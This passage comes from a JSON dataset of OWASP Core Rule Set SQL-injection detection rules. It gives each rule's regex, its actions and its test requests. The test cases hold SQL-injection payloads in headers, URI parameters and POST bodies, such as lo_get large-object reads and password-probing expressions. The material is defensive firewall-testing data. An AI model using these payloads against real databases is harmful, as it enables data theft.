i(?:crosecon)?d|onthname|ulti(?:linestring|po(?:int|lygon)))|n(?:ame_const|ot_in|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:eriod_(?:add|diff)|g_(?:client_encoding|(?:databas|read_fil)e|l(?:argeobject|s_dir)|sleep|user)|o(?:(?:lyg|siti)on|w)|rocedure_analyse)|qu(?:arter|ery_to_xml|ote)|r(?:a(?:dians|nd|wtohex)|elease_lock|ow_(?:count|to_json)|pad|trim)|s(?:chema|e(?:c_to_time|ssion_user)|ha[12]?|in|oundex|pace|q(?:lite_(?:compileoption_(?:get|used)|source_id)|rt)|t(?:arts_?with|d(?:dev_(?:po|sam)p)?|r(?:_to_date|cmp))|ub(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|ys(?:date|tem_user))|t(?:ime(?:_(?:format|to_sec)|diff|stamp(?:add|diff)?)|o(?:_(?:base64|jsonb?)|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|i(?:str|x_timestamp)|likely)|(?:pdatexm|se_json_nul)l|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|var(?:_(?:po|sam)p|iance)|we(?:ek(?:day|ofyear)|ight_string)|xmltype|yearweek)[^0-9A-Z_a-z]*\\(", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "1", "message": "SQL Injection Attack: SQL function name detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "SQL injection in request header User-Agent", "test_id": 1, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942152 ] }, "malicious_patterns": [ { "location": "header_user-agent", "value": "encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint" } ] }, { "description": "SQL injection in request header User-Agent", "test_id": 2, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942152 ] }, "malicious_patterns": [ { "location": "header_user-agent", "value": "1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true" } ] }, { "description": "SQL injection in request header User-Agent", "test_id": 3, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942152 ] }, "malicious_patterns": [ { "location": "header_user-agent", "value": "encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1624, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Referer", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "User-Agent", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\b(?:a(?:dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:cii(?:str)?|in)|tan2?)|b(?:enchmark|i(?:n_to_num|t_(?:and|count|length|x?or)))|c(?:har(?:acter)?_length|eil(?:ing)?|o(?:alesce|ercibility|llation|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert(?:_tz)?)?)|t)|rc32|ur(?:(?:dat|tim)e|rent_(?:date|setting|time(?:stamp)?|user)))|d(?:a(?:t(?:abase(?:_to_xml)?|e(?:_(?:add|format|sub)|diff))|y(?:name|of(?:month|week|year)))|count|e(?:code|grees|s_(?:de|en)crypt)|ump)|e(?:lt|n(?:c(?:ode|rypt)|ds_?with)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:el|n)d_in_set|ound_rows|rom_(?:base64|days|unixtime))|g(?:e(?:ometrycollection|t(?:_(?:format|lock)|pgusername))|(?:r(?:eates|oup_conca)|tid_subse)t)|hex(?:toraw)?|i(?:fnull|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull)|superuser)|null))|json(?:_(?:a(?:gg|rray(?:_(?:elements(?:_text)?|length))?)|build_(?:array|object)|e(?:ac|xtract_pat)h(?:_text)?|object(?:_(?:agg|keys))?|populate_record(?:set)?|strip_nulls|t(?:o_record(?:set)?|ypeof))|b(?:_(?:array(?:_(?:elements(?:_text)?|length))?|build_(?:array|object)|object(?:_(?:agg|keys))?|e(?:ac|xtract_pat)h(?:_text)?|insert|p(?:ath_(?:(?:exists|match)(?:_tz)?|query(?:_(?:(?:array|first)(?:_tz)?|tz))?)|opulate_record(?:set)?|retty)|s(?:et(?:_lax)?|trip_nulls)|t(?:o_record(?:set)?|ypeof)))?|path)?|l(?:ast_(?:day|insert_id)|case|e(?:as|f)t|i(?:kel(?:ihood|y)|nestring)|o(?:_(?:from_bytea|put)|ad_file|ca(?:ltimestamp|te)|g(?:10|2)|wer)|pad|trim)|m(?:a(?:ke(?:_set|date)|ster_pos_wait)|d5|i(?:crosecon)?d|onthname|ulti(?:linestring|po(?:int|lygon)))|n(?:ame_const|ot_in|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:eriod_(?:add|diff)|g_(?:client_encoding|(?:databas|read_fil)e|l(?:argeobject|s_dir)|sleep|user)|o(?:(?:lyg|siti)on|w)|rocedure_analyse)|qu(?:arter|ery_to_xml|ote)|r(?:a(?:dians|nd|wtohex)|elease_lock|ow_(?:count|to_json)|pad|trim)|s(?:chema|e(?:c_to_time|ssion_user)|ha[12]?|in|oundex|pace|q(?:lite_(?:compileoption_(?:get|used)|source_id)|rt)|t(?:arts_?with|d(?:dev_(?:po|sam)p)?|r(?:_to_date|cmp))|ub(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|ys(?:date|tem_user))|t(?:ime(?:_(?:format|to_sec)|diff|stamp(?:add|diff)?)|o(?:_(?:base64|jsonb?)|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|i(?:str|x_timestamp)|likely)|(?:pdatexm|se_json_nul)l|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|var(?:_(?:po|sam)p|iance)|we(?:ek(?:day|ofyear)|ight_string)|xmltype|yearweek)[^0-9A-Z_a-z]*\\(", "actions": [ { "act_name": "id", "lineno": 1625, "act_quote": "no_quote", "act_arg": "942152", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1626, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1627, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1628, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1629, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1629, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1630, "act_quote": "quotes", "act_arg": "SQL Injection Attack: SQL function name detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1631, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1632, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1633, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1634, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1635, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1636, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1637, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1638, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1639, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1640, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1641, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1642, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1643, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1624 } }, { "rule_id": "942321", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Referer", "negated": false }, { "name": "REQUEST_HEADERS", "part": "User-Agent", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)create[\\s\\x0b]+(?:function|procedure)[\\s\\x0b]*?[0-9A-Z_a-z]+[\\s\\x0b]*?\\([\\s\\x0b]*?\\)[\\s\\x0b]*?-|d(?:eclare[^0-9A-Z_a-z]+[#@][\\s\\x0b]*?[0-9A-Z_a-z]+|iv[\\s\\x0b]*?\\([\\+\\-]*[\\s\\x0b\\.0-9]+,[\\+\\-]*[\\s\\x0b\\.0-9]+\\))|exec[\\s\\x0b]*?\\([\\s\\x0b]*?@|(?:lo_(?:impor|ge)t|procedure[\\s\\x0b]+analyse)[\\s\\x0b]*?\\(|;[\\s\\x0b]*?(?:declare|open)[\\s\\x0b]+[\\-0-9A-Z_a-z]+|::(?:b(?:igint|ool)|double[\\s\\x0b]+precision|int(?:eger)?|numeric|oid|real|(?:tex|smallin)t)", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "1", "message": "Detects MySQL and PostgreSQL stored procedure/function injections", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Detects MySQL and PostgreSQL stored procedure/function injections", "test_id": 1, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "encode(lo_get(16200),'base64')::int", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942321 ] }, "malicious_patterns": [] }, { "description": "Detects MySQL and PostgreSQL stored procedure/function injections", "test_id": 2, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "overlay(password placing $$$$ from 1)::int and id=1", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942321 ] }, "malicious_patterns": [ { "location": "header_user-agent", "value": "overlay(password placing $$$$ from 1)::int and id=1" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1654, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Referer", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "User-Agent", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)create[\\s\\x0b]+(?:function|procedure)[\\s\\x0b]*?[0-9A-Z_a-z]+[\\s\\x0b]*?\\([\\s\\x0b]*?\\)[\\s\\x0b]*?-|d(?:eclare[^0-9A-Z_a-z]+[#@][\\s\\x0b]*?[0-9A-Z_a-z]+|iv[\\s\\x0b]*?\\([\\+\\-]*[\\s\\x0b\\.0-9]+,[\\+\\-]*[\\s\\x0b\\.0-9]+\\))|exec[\\s\\x0b]*?\\([\\s\\x0b]*?@|(?:lo_(?:impor|ge)t|procedure[\\s\\x0b]+analyse)[\\s\\x0b]*?\\(|;[\\s\\x0b]*?(?:declare|open)[\\s\\x0b]+[\\-0-9A-Z_a-z]+|::(?:b(?:igint|ool)|double[\\s\\x0b]+precision|int(?:eger)?|numeric|oid|real|(?:tex|smallin)t)", "actions": [ { "act_name": "id", "lineno": 1655, "act_quote": "no_quote", "act_arg": "942321", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1656, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1657, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1658, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1659, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1659, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1660, "act_quote": "quotes", "act_arg": "Detects MySQL and PostgreSQL stored procedure/function injections", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1661, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1662, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1663, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1664, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1665, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1666, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1667, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1668, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1669, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1670, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1671, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1672, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1673, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1654 } }, { "rule_id": "942015", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "3", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1677, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "3", "actions": [ { "act_name": "id", "lineno": 1677, "act_quote": "no_quote", "act_arg": "942015", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1677, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 1677, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 1677, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1677, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1677, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 1677, "act_quote": "no_quote", "act_arg": "END-REQUEST-942-APPLICATION-ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1677 } }, { "rule_id": "942016", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "3", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1678, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "3", "actions": [ { "act_name": "id", "lineno": 1678, "act_quote": "no_quote", "act_arg": "942016", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1678, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 1678, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 1678, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1678, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1678, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 1678, "act_quote": "no_quote", "act_arg": "END-REQUEST-942-APPLICATION-ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1678 } }, { "rule_id": "942251", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\W+\\d*?\\s*?\\bhaving\\b\\s*?[^\\s\\-]", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects HAVING injections", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Detects having injections: ' HAVING COUNT(CustomerID) > 5'", "test_id": 1, "request": { "method": "GET", "uri": "/get?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942251 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" } ] }, { "description": "Detects having injections negative test", "test_id": 2, "request": { "method": "GET", "uri": "/get?var=having%20fun", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942251 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=having%20fun" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1694, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\W+\\d*?\\s*?\\bhaving\\b\\s*?[^\\s\\-]", "actions": [ { "act_name": "id", "lineno": 1695, "act_quote": "no_quote", "act_arg": "942251", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1696, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1697, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1698, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1699, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1699, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1700, "act_quote": "quotes", "act_arg": "Detects HAVING injections", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1701, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1702, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1703, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1704, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1705, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1706, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1707, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1708, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1709, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1710, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1711, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1712, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1713, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1694 } }, { "rule_id": "942490", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "[\\\"'`][\\s\\d]*?[^\\w\\s]\\W*?\\d\\W*?.*?[\\\"'`\\d]", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects classic SQL injection probings 3/3", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "classic SQL injection probings 3/3", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=%22%60%20%2A%20123" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=%22%60%20%2A%20123" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "' ', 10" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "' ', 10" } ] }, { "description": "classic SQL injection probings 